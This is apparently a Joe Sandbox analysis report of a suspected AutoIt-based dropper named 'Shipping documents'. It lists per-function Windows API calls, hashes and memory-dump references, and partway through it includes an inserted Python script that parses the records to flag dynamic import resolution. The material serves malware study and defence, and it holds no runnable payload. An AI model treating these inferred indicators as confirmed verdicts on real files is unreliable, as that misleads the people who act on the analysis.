• Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
• Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
• Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
APIs
• GetDC.USER32(00000000), ref: 0044CC6D
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
• ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
• Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
• Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
• Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
APIs
• __getptd.LIBCMT ref: 0041708E
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __amsg_exit.LIBCMT ref: 004170AE
• __lock.LIBCMT ref: 004170BE
• InterlockedDecrement.KERNEL32(?), ref: 004170DB
• _free.LIBCMT ref: 004170EE
• InterlockedIncrement.KERNEL32(01932DA8), ref: 00417106
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• String ID:
• API String ID: 3470314060-0
• Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
• Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
• Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
• Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 0044B655
• EnterCriticalSection.KERNEL32(?), ref: 0044B666
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
• LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
• Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
• Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
• Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
• Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
• Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
• Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
APIs
• ___set_flsgetvalue.LIBCMT ref: 004151C0
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 004151CB
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 004151DD
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
• ExitThread.KERNEL32 ref: 004151ED
• __freefls@4.LIBCMT ref: 00415209
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same seven dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 442100245-0
• Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
• Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
• Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
• Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
• _wcslen.LIBCMT ref: 0045F94A
• SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same seven dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
• String ID: 0
• API String ID: 621800784-4108050209
• Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
• Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
• Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
• Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SetErrorMode.KERNEL32 ref: 004781CE
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• SetErrorMode.KERNEL32(?), ref: 00478270
• SetErrorMode.KERNEL32(?), ref: 00478340
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same seven dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ErrorMode$AttributesFile_memmove_wcslen
• String ID: \VH
• API String ID: 3884216118-234962358
• Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
• Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
• Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
• Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same seven dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails$#v
• API String ID: 145871493-3662034293
• Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
• Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
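The LoadLibraryA / GetProcAddress("AU3_GetPluginDetails") / FreeLibrary sequence in the record above is the AutoIt3 runtime probing a DLL for its plugin export, one of the usual indicators that the first-stage dropper is a compiled AutoIt script rather than hand-written code. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function records in the format shown on this page into call chains and flags functions that resolve imports at run time (a LoadLibrary* call followed by GetProcAddress in the same function). The regexes are inferred from the lines visible here, the sample input is copied from two of the records above, and the flagging rule in dynamic_resolution() and the triage() helper are hypothetical, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox per-function API records into structured data and flag
dynamic API resolution (LoadLibrary* followed by GetProcAddress).

Added example, not part of the Joe Sandbox report or its tooling. The line
format is inferred from the records shown on this page; the triage heuristic
in dynamic_resolution() is a hypothetical rule, not a Joe Sandbox signature.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line:  "• Name.MODULE(arg,arg), ref: 0040XXXX"
# or a subcall:  "  • Part of subcall function 004178AE: Name.MODULE ref: 0040XXXX"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subaddr>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w@]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Metadata line:  "• API String ID: 145871493-3662034293"
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*?)\s*$")

LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set when the call happens inside a callee


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into records; every 'APIs' header starts a new one."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            sub = int(m.group("subaddr"), 16) if m.group("subaddr") else None
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    int(m.group("ref"), 16), sub))
            continue
        m = KV_RE.match(line)
        if m:
            cur.meta[m.group("key")] = m.group("val")
    return records


def dynamic_resolution(rec: FunctionRecord) -> List[str]:
    """Export names resolved by GetProcAddress after a LoadLibrary* in the
    same function; '?' when the name was not recoverable at analysis time."""
    loaded = False
    resolved: List[str] = []
    for call in rec.apis:
        if call.name in LOADERS:
            loaded = True
        elif call.name == "GetProcAddress" and loaded:
            resolved.append(call.args[1] if len(call.args) > 1 else "?")
    return resolved


# Constructed sample: two records copied from the report above.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails$#v
• API String ID: 145871493-3662034293
APIs
• ___set_flsgetvalue.LIBCMT ref: 004151C0
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
• ExitThread.KERNEL32 ref: 004151ED
"""


def triage(text: str) -> List[dict]:
    """Per record: first call-site address, call chain and resolved exports."""
    out = []
    for rec in parse_records(text):
        out.append({
            "first_ref": rec.apis[0].ref if rec.apis else None,
            "chain": [c.name for c in rec.apis],
            "resolved": dynamic_resolution(rec),
            "api_string_id": rec.meta.get("API String ID"),
        })
    return out


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run it against the text of the whole "APIs" listing to get one row per function; records whose "resolved" list is non-empty are the ones worth opening in the disassembler first, and a resolved name of "?" means the export string was computed at run time, which is itself a stronger indicator than a cleartext name such as AU3_GetPluginDetails.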
APIs
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
• IsMenu.USER32(?), ref: 0044854D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
• DrawMenuBar.USER32 ref: 004485AF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same seven dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0
• API String ID: 3076010158-4108050209
• Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
• Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
• Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
• SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same seven dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: MessageSend$_memmove_wcslen
• String ID: ComboBox$ListBox
• API String ID: 1589278365-1403004172
• Opcode ID: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
• Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
• Opcode Fuzzy Hash: e833c5f683c324df3584e13527d60df096f9c23fae9490791bb62fc6faf22f53
• Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: same seven dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
• Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
• Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 2519475695-2873401336
                                                                                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                          • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                          • String ID: Line:
                                                                                                          • API String ID: 1874344091-1585850449
                                                                                                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 0-1011021900
                                                                                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                          • GetFocus.USER32 ref: 0046157B
                                                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                          • __swprintf.LIBCMT ref: 00461608
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                          • String ID: %s%d
                                                                                                          • API String ID: 2645982514-1110647743
                                                                                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
